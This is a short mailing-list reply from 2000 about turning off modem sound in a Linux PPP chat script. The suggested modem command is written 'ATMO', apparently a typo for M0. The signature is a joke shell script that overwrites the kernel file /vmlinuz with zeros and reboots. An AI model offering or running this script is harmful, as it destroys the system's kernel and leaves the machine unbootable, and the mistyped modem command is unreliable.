On Sun, Jun 11, 2000 at 04:46:29PM -0400, Arcady Genkin wrote: > I'm trying to switch off modem sound when connecting to the ppp > service provider, but can't seem to find a place to stick in M0 in the > dial string... Is there a standard way of doing it?
After all of the "ABORT <foo>" lines in /etc/chatscript/provider, put a couple lines like: '' ATZ OK ATMO Before the dial lines... The syntax of the command may be different for your modem. -- #! /bin/sh echo 'Linux Must Die!' | wall dd if=/dev/zero of=/vmlinuz bs=1 \ count=`du -Lb /vmlinuz | awk '{ /^([0-9])+/ ; print $1 }'` shutdown -r now